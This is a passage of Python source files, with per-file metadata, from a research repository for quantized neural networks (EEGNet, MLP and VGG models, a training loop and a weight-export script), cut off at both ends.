strategy=weightInqStrategy, quantInitMethod=weightInqInitMethod)\n else:\n return t.nn.Linear(n_in, n_out, bias=bias)\n\n def conv2d(name, in_channels, out_channels, kernel_size, numLevels=None, first=False, **argv):\n if quantWeight and not (not first and first_layer_only):\n if numLevels is None:\n numLevels = weightInqNumLevels\n return INQConv2d(in_channels, out_channels, kernel_size,\n numLevels=numLevels, strategy=weightInqStrategy,\n quantInitMethod=weightInqInitMethod, **argv)\n else:\n return t.nn.Conv2d(in_channels, out_channels, kernel_size, **argv)\n\n # Block 1\n self.quant1 = quantize(actFirstLayerNumLevels, first=True)\n self.conv1_pad = t.nn.ZeroPad2d((31, 32, 0, 0))\n self.conv1 = conv2d(\"conv1\", 1, F1, (1, 64), bias=False,\n numLevels=weightFirstLayerNumLevels, first=True)\n self.batch_norm1 = t.nn.BatchNorm2d(F1, momentum=0.01, eps=0.001)\n self.quant2 = quantize()\n self.conv2 = conv2d(\"conv2\", F1, D * F1, (C, 1), groups=F1, bias=False)\n self.batch_norm2 = t.nn.BatchNorm2d(D * F1, momentum=0.01, eps=0.001)\n self.activation1 = activ()\n self.pool1 = t.nn.AvgPool2d((1, 8))\n self.quant3 = quantize()\n # self.dropout1 = dropout(p=p_dropout)\n self.dropout1 = t.nn.Dropout(p=p_dropout)\n\n # Block 2\n self.sep_conv_pad = t.nn.ZeroPad2d((7, 8, 0, 0))\n self.sep_conv1 = conv2d(\"sep_conv1\", D * F1, D * F1, (1, 16), groups=D * F1, bias=False)\n self.quant4 = quantize()\n self.sep_conv2 = conv2d(\"sep_conv2\", D * F1, F2, (1, 1), bias=False)\n self.batch_norm3 = t.nn.BatchNorm2d(F2, momentum=0.01, eps=0.001)\n self.activation2 = activ()\n self.pool2 = t.nn.AvgPool2d((1, 8))\n self.quant5 = quantize()\n self.dropout2 = dropout(p=p_dropout)\n\n # Fully connected layer (classifier)\n self.flatten = Flatten()\n self.fc = linear(\"fc\", F2 * n_features, N, bias=True)\n self.quant6 = quantize(255)\n\n self.inqController = INQController(INQController.getInqModules(self), weightInqSchedule,\n clearOptimStateOnStep=True)\n self.steController = STEController(STEController.getSteModules(self),\n clearOptimStateOnStart=True)\n\n # initialize weights\n # self._initialize_params()\n\n def forward(self, x, with_stats=False):\n\n # input dimensions: (s, 1, C, T)\n x = self.quant1(x)\n\n # Block 1\n x = self.conv1_pad(x)\n x = self.conv1(x) # output dim: (s, F1, C, T-1)\n x = self.batch_norm1(x)\n x = self.quant2(x)\n x = self.conv2(x) # output dim: (s, D * F1, 1, T-1)\n x = self.batch_norm2(x)\n x = self.activation1(x)\n x = self.pool1(x) # output dim: (s, D * F1, 1, T // 8)\n x = self.quant3(x)\n x = self.dropout1(x)\n\n # Block2\n x = self.sep_conv_pad(x)\n x = self.sep_conv1(x) # output dim: (s, D * F1, 1, T // 8 - 1)\n x = self.quant4(x)\n x = self.sep_conv2(x) # output dim: (s, F2, 1, T // 8 - 1)\n x = self.batch_norm3(x)\n x = self.activation2(x)\n x = self.pool2(x) # output dim: (s, F2, 1, T // 64)\n x = self.quant5(x)\n x = self.dropout2(x)\n\n # Classification\n x = self.flatten(x) # output dim: (s, F2 * (T // 64))\n x = self.fc(x) # output dim: (s, N)\n x = self.quant6(x)\n\n if with_stats:\n stats = [('conv1_w', self.conv1.weight.data),\n ('conv2_w', self.conv2.weight.data),\n ('sep_conv1_w', self.sep_conv1.weight.data),\n ('sep_conv2_w', self.sep_conv2.weight.data),\n ('fc_w', self.fc.weight.data),\n ('fc_b', self.fc.bias.data)]\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n return self.forward(x, with_stats=True)\n\n def _initialize_params(self, weight_init=t.nn.init.xavier_uniform_, bias_init=t.nn.init.zeros_):\n \"\"\"\n Initializes all the parameters of the model\n\n Parameters:\n - weight_init: t.nn.init inplace function\n - bias_init: t.nn.init inplace function\n\n \"\"\"\n def init_weight(m):\n if isinstance(m, t.nn.Conv2d) or isinstance(m, t.nn.Linear):\n weight_init(m.weight)\n if isinstance(m, t.nn.Linear):\n bias_init(m.bias)\n\n self.apply(init_weight)\n\n\nclass Flatten(t.nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n\n\nclass TimeDropout2d(t.nn.Dropout2d):\n \"\"\"\n Dropout layer, where the last dimension is treated as channels\n \"\"\"\n def __init__(self, p=0.5, inplace=False):\n \"\"\"\n See t.nn.Dropout2d for parameters\n \"\"\"\n super(TimeDropout2d, self).__init__(p=p, inplace=inplace)\n\n def forward(self, input):\n if self.training:\n input = input.permute(0, 3, 1, 2)\n input = F.dropout2d(input, self.p, True, self.inplace)\n input = input.permute(0, 2, 3, 1)\n return input\n" }, { "alpha_fraction": 0.5191181302070618, "alphanum_fraction": 0.5497760772705078, "avg_line_length": 37.7066650390625, "blob_id": "5cbadaa6fe7c452b64f5a67cbb0fcdab8fcb1c0f", "content_id": "540eb6edff5e52a3750ffaddcb44db1c6e6e4452", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2903, "license_type": "permissive", "max_line_length": 83, "num_lines": 75, "path": "/quantlab/MNIST/MLP/mlp.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear\nfrom quantlab.indiv.inq_ops import INQController, INQLinear\n\nclass MLP(nn.Module):\n \"\"\"Quantized Multi-Layer Perceptron (both weights and activations).\"\"\"\n def __init__(self, capacity, quant_schemes, \n quantAct=True, quantWeights=True, \n weightInqSchedule=None):\n super().__init__()\n nh = int(2048 * capacity)\n if weightInqSchedule != None:\n weightInqSchedule = {int(k): v for k, v in weightInqSchedule}\n def activ(name, nc):\n if quantAct:\n return StochasticActivation(*quant_scheme[name], nc)\n else:\n return nn.ReLU()\n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule != None:\n return INQLinear(ni, no, bias=bias, numBits=2)\n else: \n return StochasticLinear(*quant_scheme[name], ni, no, bias=bias)\n else:\n return nn.Linear(ni, no, bias=bias)\n \n self.phi1_fc = linear('phi1_fc', 28*28, nh, bias=False)\n self.phi1_bn = nn.BatchNorm1d(nh)\n self.phi1_act = activ('phi1_act', nh)\n self.phi2_fc = linear('phi2_fc', nh, nh, bias=False)\n self.phi2_bn = nn.BatchNorm1d(nh)\n self.phi2_act = activ('phi2_act', nh)\n self.phi3_fc = linear('phi3_fc', nh, nh, bias=False)\n self.phi3_bn = nn.BatchNorm1d(nh)\n self.phi3_act = activ('phi3_act', nh)\n self.phi4_fc = linear('phi4_fc', nh, 10, bias=False)\n self.phi4_bn = nn.BatchNorm1d(10)\n \n #weightInqSchedule={15: 0.5, 22: 0.75, 30: 0.875, 37: 0.9375, 44: 1.0}\n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule)\n\n def forward(self, x, withStats=False):\n stats = []\n x = x.view(-1, 28*28)\n x = self.phi1_fc(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_fc(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_fc(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_fc(x)\n x = self.phi4_bn(x)\n if withStats:\n stats.append(('phi1_fc_w', self.phi1_fc.weight.data))\n stats.append(('phi2_fc_w', self.phi2_fc.weight.data))\n stats.append(('phi3_fc_w', self.phi3_fc.weight.data))\n stats.append(('phi4_fc_w', self.phi4_fc.weight.data))\n return stats, x\n else: \n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.8214285969734192, "avg_line_length": 28, "blob_id": "e3a293d12d0117c0635115a6850dada631807ac6", "content_id": "7261644584e335de50c05b1be82febc9bd686eb9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "permissive", "max_line_length": 28, "num_lines": 1, "path": "/quantlab/ImageNet/GoogLeNet/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "../MobileNetv2/preprocess.py" }, { "alpha_fraction": 0.8267716765403748, "alphanum_fraction": 0.8267716765403748, "avg_line_length": 30.75, "blob_id": "d077c4b346a1289ac19121452606d419aba34d98", "content_id": "5795b90cbbc08d38ce09d7ca6b5c341aa90c61c9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "permissive", "max_line_length": 55, "num_lines": 4, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .meyernet import MeyerNet\n" }, { "alpha_fraction": 0.6383461952209473, "alphanum_fraction": 0.654475212097168, "avg_line_length": 31.607406616210938, "blob_id": "d1dd36d6ff66ea63e1e3633e8f3e18488d298546", "content_id": "072db0b73716c4c213f8a31e26a03d26e72a4be3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4402, "license_type": "permissive", "max_line_length": 102, "num_lines": 135, "path": "/export_net_data.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport argparse\nimport json\nimport torch\nimport shutil\n\nfrom main import main as quantlab_main\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e', '--exp_id', help='experiment identification', type=int, default=999)\nparser.add_argument('-s', '--sample', help='index of the sample', type=int, default=0)\nparser.add_argument('--train', help='Train network', action='store_true')\nparser.add_argument('-a', '--all', help='Export all samples', action='store_true')\n\nargs = parser.parse_args()\n\nexp_folder = f'BCI-CompIV-2a/logs/exp{args.exp_id:03}'\noutput_file = 'export/{}.npz'\noutput_config_file = \"export/config.json\"\n\n# train the network\nif args.train:\n # delete the exp folder\n try:\n shutil.rmtree(exp_folder)\n print('exp folder was deleted!')\n except:\n print('exp folder does not exist, skipping deletion')\n quantlab_main('BCI-CompIV-2a', 'EEGNet', exp_id=args.exp_id, ckpt_every=1, num_workers=1,\n do_validPreTrain=False, use_single_gpu=True)\n\n# import the EEGnet folder\nexec(open('quantlab/BCI-CompIV-2a/EEGNet/preprocess.py').read())\nexec(open('quantlab/BCI-CompIV-2a/EEGNet/eegnet.py').read())\n\nexp_folder = f'BCI-CompIV-2a/logs/exp{args.exp_id:03}'\n\n# load the configuration file\nwith open(f'{exp_folder}/config.json') as _f:\n config = json.load(_f)\n\n# get data loader\n_, _, dataset = load_data_sets('BCI-CompIV-2a/data', config['treat']['data'])\n\n# load the model\nckpts = os.listdir(f'{exp_folder}/saves')\nckpts = [x for x in ckpts if \"epoch\" in x]\nckpts.sort()\nlast_epoch = int(ckpts[-1].replace('epoch', '').replace('.ckpt', ''))\nckpt = torch.load(f'{exp_folder}/saves/{ckpts[-1]}')\nmodel = EEGNet(**config['indiv']['net']['params'])\nmodel.load_state_dict(ckpt['indiv']['net'])\nfor module in model.steController.modules:\n module.started = True\n\nmodel.train(False)\n\n# export all weights\nweights = {key: value.cpu().detach().numpy() for key, value in ckpt['indiv']['net'].items()}\nnp.savez(output_file.format(\"net\"), **weights)\n\nif args.all:\n samples = []\n labels = []\n predictions = []\n\n n_samples = len(dataset)\n for sample in range(n_samples):\n x = dataset[sample][0]\n x = x.reshape(1, 1, 22, 1125)\n label = dataset[sample][1]\n prediction = model(x)\n\n samples.append(x.numpy())\n labels.append(label.numpy())\n predictions.append(prediction.detach().numpy())\n\n np.savez(output_file.format(\"benchmark\"), samples=samples, labels=labels, predictions=predictions)\n\n\n# save input data\nnp.savez(output_file.format(\"input\"), input=dataset[args.sample][0].numpy())\n\n# prepare verification data\nverification = {}\n# do forward pass and compute the result of the network\nwith torch.no_grad():\n x = dataset[args.sample][0]\n verification['input'] = x.numpy()\n x = x.reshape(1, 1, 22, 1125)\n x = model.quant1(x)\n verification['input_quant'] = x.numpy()\n x = model.conv1_pad(x)\n x = model.conv1(x)\n verification['layer1_conv_out'] = x.numpy()\n x = model.batch_norm1(x)\n verification['layer1_bn_out'] = x.numpy()\n x = model.quant2(x)\n verification['layer1_activ'] = x.numpy()\n x = model.conv2(x)\n verification['layer2_conv_out'] = x.numpy()\n x = model.batch_norm2(x)\n verification['layer2_bn_out'] = x.numpy()\n x = model.activation1(x)\n verification['layer2_relu_out'] = x.numpy()\n x = model.pool1(x)\n verification['layer2_pool_out'] = x.numpy()\n x = model.quant3(x)\n verification['layer2_activ'] = x.numpy()\n x = model.sep_conv_pad(x)\n x = model.sep_conv1(x)\n verification['layer3_conv_out'] = x.numpy()\n x = model.quant4(x)\n verification['layer3_activ'] = x.numpy()\n x = model.sep_conv2(x)\n verification['layer4_conv_out'] = x.numpy()\n x = model.batch_norm3(x)\n verification['layer4_bn_out'] = x.numpy()\n x = model.activation2(x)\n verification['layer4_relu_out'] = x.numpy()\n x = model.pool2(x)\n verification['layer4_pool_out'] = x.numpy()\n x = model.quant5(x)\n verification['layer4_activ'] = x.numpy()\n x = model.flatten(x)\n x = model.fc(x)\n verification['output'] = x.numpy()\n x = model.quant6(x)\n verification['output_quant'] = x.numpy()\n\nnp.savez(output_file.format(\"verification\"), **verification)\n\n# copy the configuration file to the export folder\nshutil.copyfile(f'{exp_folder}/config.json', output_config_file)\n" }, { "alpha_fraction": 0.558834969997406, "alphanum_fraction": 0.56291264295578, "avg_line_length": 44.57522201538086, "blob_id": "b015e9899a85e4e0aea8ff59eefbc0ec4e57eae3", "content_id": "ba69487b5459c0cfd36b23f6d2c6e88ee95b49f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5150, "license_type": "permissive", "max_line_length": 118, "num_lines": 113, "path": "/main.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport argparse\n\nfrom quantlab.protocol.logbook import Logbook\nfrom quantlab.indiv.daemon import get_topo\nfrom quantlab.treat.daemon import get_algo, get_data\nfrom quantlab.protocol.rooms import train, test\nimport quantlab.indiv as indiv\n\n\ndef main(problem, topology, exp_id=None, load='best', mode='train', ckpt_every=10, num_workers=10,\n do_validPreTrain=True, use_single_gpu=False):\n # create/retrieve experiment logbook\n logbook = Logbook(problem, topology, exp_id, load)\n\n # create/retrieve network and treatment\n net, net_maybe_par, device, loss_fn = get_topo(logbook)\n thr, opt, lr_sched = get_algo(logbook, net)\n train_l, valid_l, test_l = get_data(logbook, num_workers=num_workers)\n\n if use_single_gpu:\n net_maybe_par = net\n\n # run experiment\n if mode == 'train':\n for _ in range(logbook.i_epoch + 1, logbook.config['treat']['max_epoch'] + 1):\n\n logbook.start_epoch()\n thr.step()\n\n #prepare training network\n net.train()\n for ctrlr in indiv.Controller.getControllers(net):\n # call controllers for e.g. LR, annealing, ... adjustments\n ctrlr.step_preTraining(logbook.i_epoch, opt, tensorboardWriter=logbook.writer)\n\n # validate pre-training network\n validPreTrain_stats = {}\n if do_validPreTrain:\n validPreTrain_stats = test(logbook, net, device, loss_fn, valid_l, valid=True, prefix='validPreTrain')\n\n # train\n train_stats = train(logbook, net_maybe_par, device, loss_fn, opt, train_l)\n\n # prepare validation network\n net.eval()\n for ctrlr in indiv.Controller.getControllers(net):\n ctrlr.step_preValidation(logbook.i_epoch, tensorboardWriter=logbook.writer)\n\n #validate (re-)trained network\n valid_stats = test(logbook, net, device, loss_fn, valid_l, valid=True)\n stats = {**train_stats, **valid_stats, **validPreTrain_stats}\n\n # update learning rate\n if 'metrics' in lr_sched.step.__code__.co_varnames:\n lr_sched_metric = stats[logbook.config['treat']['lr_scheduler']['step_metric']]\n lr_sched.step(lr_sched_metric)\n else:\n lr_sched.step()\n\n # save model if update metric has improved...\n if logbook.is_better(stats):\n ckpt = {'indiv': {'net': net.state_dict()},\n 'treat': {\n 'thermostat': thr.state_dict(),\n 'optimizer': opt.state_dict(),\n 'lr_scheduler': lr_sched.state_dict(),\n 'i_epoch': logbook.i_epoch\n },\n 'protocol': {'metrics': logbook.metrics}}\n logbook.store_checkpoint(ckpt, is_best=True)\n\n # ...and/or if checkpoint epoch\n is_ckpt_epoch = (logbook.i_epoch % int(ckpt_every)) == 0\n if is_ckpt_epoch:\n ckpt = {'indiv': {'net': net.state_dict()},\n 'treat': {\n 'thermostat': thr.state_dict(),\n 'optimizer': opt.state_dict(),\n 'lr_scheduler': lr_sched.state_dict(),\n 'i_epoch': logbook.i_epoch\n },\n 'protocol': {'metrics': logbook.metrics}}\n logbook.store_checkpoint(ckpt)\n\n # return the last validation stats\n return train_stats, valid_stats\n\n elif mode == 'test':\n # test\n net.eval()\n test_stats = test(logbook, net, device, loss_fn, test_l)\n return test_stats\n\n\nif __name__ == \"__main__\":\n # Command Line Interface\n parser = argparse.ArgumentParser(description='QuantLab')\n parser.add_argument('--problem', help='MNIST/CIFAR-10/ImageNet/COCO')\n parser.add_argument('--topology', help='Network topology')\n parser.add_argument('--exp_id', help='Experiment to launch/resume', default=None)\n parser.add_argument('--load', help='Checkpoint to load: best/last/i_epoch', default='best')\n parser.add_argument('--mode', help='Experiment mode: train/test', default='train')\n parser.add_argument('--ckpt_every', help='Frequency of checkpoints (in epochs)', default=10, type=int)\n parser.add_argument('--num_workers', help='Number of workers for DataLoader', default=10, type=int)\n parser.add_argument('--skip_validPreTrain', help='Skip validation before training', action='store_true')\n parser.add_argument('--use_single_gpu', help='Use a single GPU', action='store_true')\n args = parser.parse_args()\n\n main(args.problem, args.topology, args.exp_id, args.load, args.mode, args.ckpt_every,\n args.num_workers, not args.skip_validPreTrain, args.use_single_gpu)\n" }, { "alpha_fraction": 0.527804434299469, "alphanum_fraction": 0.554650068283081, "avg_line_length": 29.676469802856445, "blob_id": "a0deea5e44678a7eabbd8db710b55d9ffdb69f7e", "content_id": "b42af71ac96cbeb794eb4ae7ffe993900190f774", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "permissive", "max_line_length": 76, "num_lines": 68, "path": "/quantlab/MNIST/MLP/mlpbaseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torch.nn as nn\n\n\n# In order for the baselines to be launched with the same logic as quantized\n# models, an empty quantization scheme and an empty thermostat schedule need\n# to be configured.\n# Use the following templates for the `net` and `thermostat` configurations:\n#\n# \"net\": {\n# \"class\": \"MLPBaseline\",\n# \"params\": {\"capacity\": 1},\n# \"pretrained\": null,\n# \"loss_function\": {\n# \"class\": \"HingeLoss\",\n# \"params\": {\"num_classes\": 10}\n# }\n# }\n#\n# \"thermostat\": {\n# \"class\": \"MLPBaseline\",\n# \"params\": {\n# \"noise_schemes\": {},\n# \"bindings\": []\n# }\n# }\n\nclass MLPBaseline(nn.Module):\n \"\"\"Multi-Layer Perceptron.\"\"\"\n def __init__(self, capacity):\n super(MLPBaseline, self).__init__()\n nh = int(2048 * capacity)\n self.phi1_fc = nn.Linear(28 * 28, nh, bias=False)\n self.phi1_bn = nn.BatchNorm1d(nh)\n self.phi1_act = nn.ReLU6()\n self.phi2_fc = nn.Linear(nh, nh, bias=False)\n self.phi2_bn = nn.BatchNorm1d(nh)\n self.phi2_act = nn.ReLU6()\n self.phi3_fc = nn.Linear(nh, nh, bias=False)\n self.phi3_bn = nn.BatchNorm1d(nh)\n self.phi3_act = nn.ReLU6()\n self.phi4_fc = nn.Linear(nh, 10)\n\n def forward(self, x, withStats=False):\n x = x.view(-1, 28 * 28)\n x = self.phi1_fc(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_fc(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_fc(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_fc(x)\n if withStats:\n stats = []\n stats.append(('phi1_fc_w', self.phi1_fc.weight.data))\n stats.append(('phi2_fc_w', self.phi2_fc.weight.data))\n stats.append(('phi3_fc_w', self.phi3_fc.weight.data))\n stats.append(('phi4_fc_w', self.phi4_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.8373494148254395, "alphanum_fraction": 0.8373494148254395, "avg_line_length": 32.20000076293945, "blob_id": "1aefc90b7f336437535d524162a2728977a509f8", "content_id": "73a00d0a8be4884bbdcc7344ef64a2bf1deca913", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "permissive", "max_line_length": 55, "num_lines": 5, "path": "/quantlab/BCI-CompIV-2a/EEGNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .eegnet import EEGNet\nfrom .eegnetbaseline import EEGNetBaseline\n" }, { "alpha_fraction": 0.4913890063762665, "alphanum_fraction": 0.5202171206474304, "avg_line_length": 42.060482025146484, "blob_id": "16ca48656ad55fa38e4b888a80fe02ba127b853e", "content_id": "a54cce7c3c2638d649bd13b839581979b37e3881", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10684, "license_type": "permissive", "max_line_length": 98, "num_lines": 248, "path": "/quantlab/CIFAR-10/VGG/vgg.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation\n\nclass VGG(nn.Module):\n \"\"\"Quantizable VGG.\"\"\"\n def __init__(self, capacity=1, quant_schemes=None, \n quantAct=True, quantActSTENumLevels=None, quantWeights=True, \n weightInqSchedule=None, weightInqBits=None, weightInqLevels=None, \n weightInqStrategy=\"magnitude\", \n quantSkipFirstLayer=False, quantSkipLastLayer=False, \n stepEveryEpoch=False, weightInit=None, \n rescaleWeights=False, variant=None, weightInqQuantInit=None):\n \n super().__init__()\n \n assert(weightInqBits == None or weightInqLevels == None)\n if weightInqBits != None:\n print('warning: weightInqBits deprecated')\n if weightInqBits == 1:\n weightInqLevels = 2\n elif weightInqBits >= 2:\n weightInqLevels = 2**weightInqBits\n else:\n assert(False)\n \n def activ(name, nc):\n if quantAct:\n if quantActSTENumLevels != None and quantActSTENumLevels > 0: \n return STEActivation(startEpoch=0, \n numLevels=quantActSTENumLevels)\n else:\n return StochasticActivation(*quant_schemes[name], nc)\n else: \n assert(quantActSTENumLevels == None or quantActSTENumLevels <= 0)\n return nn.ReLU(inplace=True)\n \n def conv2d(name, ni, no, kernel_size=3, stride=1, padding=1, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticConv2d(*quant_schemes[name], ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n else:\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, bias=bias)\n \n def linear(name, ni, no, bias=False):\n if quantWeights:\n if weightInqSchedule == None:\n return StochasticLinear(*quant_schemes[name], ni, no, bias=bias)\n else:\n return INQLinear(ni, no, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Linear(ni, no, bias=bias)\n \n c0 = 3\n c1 = int(128 * capacity)\n c2 = int(256 * capacity)\n c3 = int(512 * capacity)\n nh = 1024\n \n # convolutional layers\n if quantSkipFirstLayer:\n self.phi1_conv = nn.Conv2d(c0, c1, kernel_size=3, padding=1, bias=False)\n else:\n self.phi1_conv = conv2d('phi1_conv', c0, c1)\n self.phi1_bn = nn.BatchNorm2d(c1)\n self.phi1_act = activ('phi1_act', c1)\n self.phi2_conv = conv2d('phi2_conv', c1, c1)\n self.phi2_mp = nn.MaxPool2d(kernel_size=2, stride=2)\n self.phi2_bn = nn.BatchNorm2d(c1)\n self.phi2_act = activ('phi2_act', c1)\n self.phi3_conv = conv2d('phi3_conv', c1, c2)\n self.phi3_bn = nn.BatchNorm2d(c2)\n self.phi3_act = activ('phi3_act', c2)\n self.phi4_conv = conv2d('phi4_conv', c2, c2)\n self.phi4_mp = nn.MaxPool2d(kernel_size=2, stride=2)\n self.phi4_bn = nn.BatchNorm2d(c2)\n self.phi4_act = activ('phi4_act', c2)\n self.phi5_conv = conv2d('phi5_conv', c2, c3)\n self.phi5_bn = nn.BatchNorm2d(c3)\n self.phi5_act = activ('phi5_act', c3)\n self.phi6_conv = conv2d('phi6_conv', c3, c3)\n self.phi6_mp = nn.MaxPool2d(kernel_size=2, stride=2)\n self.phi6_bn = nn.BatchNorm2d(c3)\n self.phi6_act = activ('phi6_act', c3)\n # dense layers\n if variant == None:\n self.phi7_fc = linear('phi7_fc', c3*4*4, nh)\n self.phi7_bn = nn.BatchNorm1d(nh)\n self.phi7_act = activ('phi7_act', nh)\n self.phi8_fc = linear('phi8_fc', nh, nh)\n self.phi8_bn = nn.BatchNorm1d(nh)\n self.phi8_act = activ('phi8_act', nh)\n if quantSkipLastLayer:\n self.phi9_fc = nn.Linear(nh, 10, bias=False)\n self.phi9_bn = nn.BatchNorm1d(10)\n else:\n self.phi9_fc = linear('phi9_fc', nh, 10)\n self.phi9_bn = nn.BatchNorm1d(10)\n elif variant == 'VGG-Small':\n assert(quantSkipLastLayer)\n self.phi7_fc = nn.Identity()\n self.phi7_bn = nn.Identity()\n self.phi7_act = nn.Identity()\n self.phi8_fc = nn.Identity()\n self.phi8_bn = nn.Identity()\n self.phi8_act = nn.Identity()\n self.phi9_fc = nn.Linear(c3*4*4, 10, bias=True)\n self.phi9_bn = nn.Identity()\n else:\n assert(False)\n \n \n \n # https://unify.id/wp-content/uploads/2018/03/weight_init_BNN.pdf\n def initWeightFunc(m):\n if (isinstance(m, nn.Conv2d) or \n isinstance(m, INQConv2d) or \n isinstance(m, StochasticConv2d)):\n w = m.weight.data\n #not initializing bias here...\n if weightInit == None:\n pass\n elif weightInit == \"He\": \n nn.init.kaiming_normal_(w, mode='fan_in', nonlinearity='relu')\n elif weightInit == \"orthogonal\":\n torch.nn.init.orthogonal_(w, gain=1) \n else:\n assert(False)\n \n self.apply(initWeightFunc)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True, \n stepEveryEpoch=stepEveryEpoch, \n rescaleWeights=rescaleWeights)\n\n def forward(self, x, withStats=False):\n x = self.phi1_conv(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_mp(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_conv(x)\n x = self.phi4_mp(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = self.phi6_conv(x)\n x = self.phi6_mp(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n# x = x.reshape(-1, torch.Tensor(list(x.size()[-3:])).to(torch.int32).prod().item())\n x = x.reshape(x.size(0), -1)\n x = self.phi7_fc(x)\n x = self.phi7_bn(x)\n x = self.phi7_act(x)\n x = self.phi8_fc(x)\n x = self.phi8_bn(x)\n x = self.phi8_act(x)\n x = self.phi9_fc(x)\n x = self.phi9_bn(x)\n if withStats:\n stats = []\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n# stats.append(('phi7_fc_w', self.phi7_fc.weight.data))\n# stats.append(('phi8_fc_w', self.phi8_fc.weight.data))\n# stats.append(('phi9_fc_w', self.phi9_fc.weight.data))\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n \n# LOAD NETWORK\nif __name__ == '__main__':\n model = VGG(quantAct=False, quantWeights=True, \n weightInqSchedule={'1': 1.0}, quantSkipFirstLayer=True)\n# path = '../../../CIFAR-10/logs/exp048/saves/epoch1050.ckpt'\n# path = '../../../CIFAR-10/logs/exp057/saves/epoch0900.ckpt'\n# path = '../../../CIFAR-10/logs/exp066/saves/epoch1150.ckpt'\n# path = '../../../CIFAR-10/logs/exp069/saves/epoch0100.ckpt'\n# path = '../../../CIFAR-10/logs/exp308/saves/best.ckpt' # TWN with rescaling\n# path = '../../../CIFAR-10/logs/exp071/saves/best.ckpt' # TWN slow latest\n# path = '../../../CIFAR-10/logs/exp273/saves/best.ckpt' # TWN fast latest\n path = '../../../CIFAR-10/logs/exp032/saves/best.ckpt' # TNN\n# path = 